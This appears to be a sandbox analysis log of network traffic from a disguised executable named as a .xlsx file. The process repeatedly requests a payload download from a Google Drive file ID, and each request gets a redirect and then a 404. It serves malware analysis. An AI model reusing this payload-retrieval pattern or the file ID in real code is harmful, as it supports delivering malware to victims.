                                                        2024-12-16 16:58:24 UTC | 1844              | IN        | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC5gplIk9aWtG2OizbMSZcYAmX3WVFDwhzKVatQHPnAMmpshVwSPhaPN4dm47Ju49C0u
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:23 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-CpXKikGZJSW4-Nslu1zAIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:24 UTC | 1652              | IN        | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 69 32 57 4a 37 4b 67 48 6b 47 79 6b 66 7a 48 65 42 6e 51 6f 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8i2WJ7KgHkGykfzHeBnQoQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID | Process
                                                        16         | 192.168.2.8 | 49727       | 172.217.19.174 | 443              | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp               | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:25 UTC | 417               | OUT       | GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:26 UTC | 1920              | IN        | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:26 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce--NRMrTAixhA4UXnXz4Haww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.8 | 49728 | 142.250.181.1 | 443 | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 16:58:28 UTC | 459 | OUT | GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY

2024-12-16 16:58:29 UTC | 1844 | IN | HTTP/1.1 404 Not Found
X-GUploader-UploadID: AFiumC5yshGBTP9KYwDoCluf2c407DFNsdUYXeuPHVLetEdD71YMf886mgV2_nGeWrbN7AZt
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 16 Dec 2024 16:58:29 GMT
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Content-Security-Policy: script-src 'nonce-IRKCx1nAUszw3Y4rLk3B_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
Content-Length: 1652
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
Connection: close

2024-12-16 16:58:29 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yF2vfZIGv7XYjQ-JYRwGZQ">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.8 | 49730 | 172.217.19.174 | 443 | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 16:58:31 UTC | 417 | OUT | GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: drive.google.com
Cache-Control: no-cache
Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY

2024-12-16 16:58:32 UTC | 1920 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 16 Dec 2024 16:58:31 GMT
Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
Strict-Transport-Security: max-age=31536000
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'nonce-KPfjUvOvnpPJmW8aTNlIeg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.8 | 49736 | 142.250.181.1 | 443 | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 16:58:34 UTC | 459 | OUT | GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY

2024-12-16 16:58:35 UTC | 1844 | IN | HTTP/1.1 404 Not Found
X-GUploader-UploadID: AFiumC5y9Ls_0uWWG4a_qMg6miJaPIx57RaysFJKrU2LgzOhrfRGfCBussr-xIAURga4DwxR
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 16 Dec 2024 16:58:34 GMT
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Content-Security-Policy: script-src 'nonce-kdrDnV6r3_lplXIAfzZ4HA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Length: 1652
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
Connection: close

2024-12-16 16:58:35 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="chtj-OgywLNGBO59I1Vzkg">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.8 | 49742 | 172.217.19.174 | 443 | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 16:58:36 UTC | 417 | OUT | GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: drive.google.com
Cache-Control: no-cache
Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY

2024-12-16 16:58:37 UTC | 1920 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 16 Dec 2024 16:58:37 GMT
Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
Strict-Transport-Security: max-age=31536000
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'nonce-T2P5FhBtOB-biswnaEr88A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.8 | 49748 | 142.250.181.1 | 443 | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 16:58:39 UTC | 459 | OUT | GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY

2024-12-16 16:58:40 UTC | 1844 | IN | HTTP/1.1 404 Not Found
X-GUploader-UploadID: AFiumC5kLglCmpi1M1uiYUtow5_xWVCFWt-dnI8y-hYx_XhV6FjvMrXJU7gxxu_s02NRgSw0
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 16 Dec 2024 16:58:40 GMT
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: script-src 'nonce-IKqxiRuJi9j75EgjhG78mw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
Content-Length: 1652
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
Connection: close

2024-12-16 16:58:40 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TMYEL8h8FPHzkpOFs9JXYA">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.8 | 49758 | 172.217.19.174 | 443 | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 16:58:42 UTC | 417 | OUT | GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: drive.google.com
Cache-Control: no-cache
Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY

2024-12-16 16:58:43 UTC | 1920 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 16 Dec 2024 16:58:42 GMT
Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
Strict-Transport-Security: max-age=31536000
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Content-Security-Policy: script-src 'nonce-zc33uYvXW_Maq6HRY2fF3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.849764142.250.181.1443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:44 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:45 UTC  1844               IN         HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC5ySmzlUQfiaa6_KDXJESL2cDQjTswUyr6T0y8HWTZE2E7G7ojaLZkjquJ_AvCFNKoG
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:45 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-4wdzbC-IeVjHfY9zt4ovsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:45 UTC  1652               IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="H5o_-SYtMGpvaG8sAtB8iA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                        24          192.168.2.8  49771        172.217.19.174  443               928  C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp                Bytes transferred  Direction  Data
                                                        2024-12-16 16:58:47 UTC  417                OUT        GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
